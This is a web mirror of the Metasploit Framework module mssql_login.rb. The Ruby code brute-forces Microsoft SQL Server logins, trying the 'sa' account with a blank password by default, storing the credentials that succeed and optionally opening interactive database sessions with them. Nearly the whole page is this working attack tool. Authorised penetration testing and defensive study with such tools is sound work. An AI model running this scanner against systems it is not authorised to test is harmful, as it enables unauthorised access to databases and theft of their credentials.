Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/scanner/mssql/mssql_login.rb
19715 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
require 'metasploit/framework/credential_collection'
7
require 'metasploit/framework/login_scanner/mssql'
8
require 'rex/proto/mssql/client'
9
require 'rex/post/mssql'
10
11
class MetasploitModule < Msf::Auxiliary
12
include Msf::Exploit::Remote::MSSQL
13
include Msf::Auxiliary::Report
14
include Msf::Auxiliary::AuthBrute
15
include Msf::Auxiliary::CommandShell
16
include Msf::Auxiliary::Scanner
17
include Msf::Sessions::CreateSessionOptions
18
include Msf::Auxiliary::ReportSummary
19
20
def initialize
21
super(
22
'Name' => 'MSSQL Login Utility',
23
'Description' => 'This module simply queries the MSSQL instance for a specific user/pass (default is sa with blank).',
24
'Author' => 'MC',
25
'References' => [
26
[ 'CVE', '1999-0506'] # Weak password
27
],
28
'License' => MSF_LICENSE,
29
# some overrides from authbrute since there is a default username and a blank password
30
'DefaultOptions' => {
31
'USERNAME' => 'sa',
32
'BLANK_PASSWORDS' => true,
33
'CreateSession' => false
34
}
35
)
36
register_options([
37
Opt::Proxies,
38
OptBool.new('TDSENCRYPTION', [ true, 'Use TLS/SSL for TDS data "Force Encryption"', false]),
39
OptBool.new('CreateSession', [false, 'Create a new session for every successful login', false])
40
])
41
42
if framework.features.enabled?(Msf::FeatureManager::MSSQL_SESSION_TYPE)
43
add_info('New in Metasploit 6.4 - The %grnCreateSession%clr option within this module can open an interactive session')
44
else
45
options_to_deregister = %w[CreateSession]
46
end
47
deregister_options(*options_to_deregister)
48
end
49
50
def create_session?
51
if framework.features.enabled?(Msf::FeatureManager::MSSQL_SESSION_TYPE)
52
datastore['CreateSession']
53
else
54
false
55
end
56
end
57
58
def run
59
results = super
60
logins = results.flat_map { |_k, v| v[:successful_logins] }
61
sessions = results.flat_map { |_k, v| v[:successful_sessions] }
62
print_status("Bruteforce completed, #{logins.size} #{logins.size == 1 ? 'credential was' : 'credentials were'} successful.")
63
return results unless framework.features.enabled?(Msf::FeatureManager::MSSQL_SESSION_TYPE)
64
65
if create_session?
66
print_status("#{sessions.size} MSSQL #{sessions.size == 1 ? 'session was' : 'sessions were'} opened successfully.")
67
else
68
print_status('You can open an MSSQL session with these credentials and %grnCreateSession%clr set to true')
69
end
70
results
71
end
72
73
def run_host(ip)
74
print_status("#{rhost}:#{rport} - MSSQL - Starting authentication scanner.")
75
76
if datastore['TDSENCRYPTION']
77
if create_session?
78
raise Msf::OptionValidateError.new(
79
{
80
'TDSENCRYPTION' => "Cannot create sessions when encryption is enabled. See https://github.com/rapid7/metasploit-framework/issues/18745 to vote for this feature"
81
}
82
)
83
else
84
print_status("TDS Encryption enabled")
85
end
86
end
87
88
cred_collection = build_credential_collection(
89
realm: datastore['DOMAIN'],
90
username: datastore['USERNAME'],
91
password: datastore['PASSWORD']
92
)
93
94
scanner = Metasploit::Framework::LoginScanner::MSSQL.new(
95
configure_login_scanner(
96
host: ip,
97
port: rport,
98
proxies: datastore['PROXIES'],
99
cred_details: cred_collection,
100
stop_on_success: datastore['STOP_ON_SUCCESS'],
101
bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
102
connection_timeout: 30,
103
max_send_size: datastore['TCP::max_send_size'],
104
send_delay: datastore['TCP::send_delay'],
105
auth: datastore['Mssql::Auth'],
106
domain_controller_rhost: datastore['DomainControllerRhost'],
107
hostname: datastore['Mssql::Rhostname'],
108
windows_authentication: datastore['USE_WINDOWS_AUTHENT'],
109
tdsencryption: datastore['TDSENCRYPTION'],
110
framework: framework,
111
framework_module: self,
112
use_client_as_proof: create_session?,
113
ssl: datastore['SSL'],
114
ssl_version: datastore['SSLVersion'],
115
ssl_verify_mode: datastore['SSLVerifyMode'],
116
ssl_cipher: datastore['SSLCipher'],
117
local_port: datastore['CPORT'],
118
local_host: datastore['CHOST']
119
)
120
)
121
successful_logins = []
122
successful_sessions = []
123
scanner.scan! do |result|
124
credential_data = result.to_h
125
credential_data.merge!(
126
module_fullname: self.fullname,
127
workspace_id: myworkspace_id
128
)
129
if result.success?
130
credential_core = create_credential(credential_data)
131
credential_data[:core] = credential_core
132
create_credential_login(credential_data)
133
print_good "#{ip}:#{rport} - Login Successful: #{result.credential}"
134
successful_logins << result
135
136
if create_session?
137
begin
138
successful_sessions << session_setup(result)
139
rescue ::StandardError => e
140
elog('Failed to setup the session', error: e)
141
print_brute level: :error, ip: ip, msg: "Failed to setup the session - #{e.class} #{e.message}"
142
result.connection.close unless result.connection.nil?
143
end
144
end
145
else
146
invalidate_login(credential_data)
147
vprint_error "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})"
148
end
149
end
150
{ successful_logins: successful_logins, successful_sessions: successful_sessions }
151
end
152
153
# @param [Metasploit::Framework::LoginScanner::Result] result
154
# @return [Msf::Sessions::MSSQL]
155
def session_setup(result)
156
return unless (result.connection && result.proof)
157
158
my_session = Msf::Sessions::MSSQL.new(result.connection, { client: result.proof, **result.proof.detect_platform_and_arch })
159
merge_me = {
160
'USERPASS_FILE' => nil,
161
'USER_FILE' => nil,
162
'PASS_FILE' => nil,
163
'USERNAME' => result.credential.public,
164
'PASSWORD' => result.credential.private
165
}
166
167
start_session(self, nil, merge_me, false, my_session.rstream, my_session)
168
end
169
end
170
171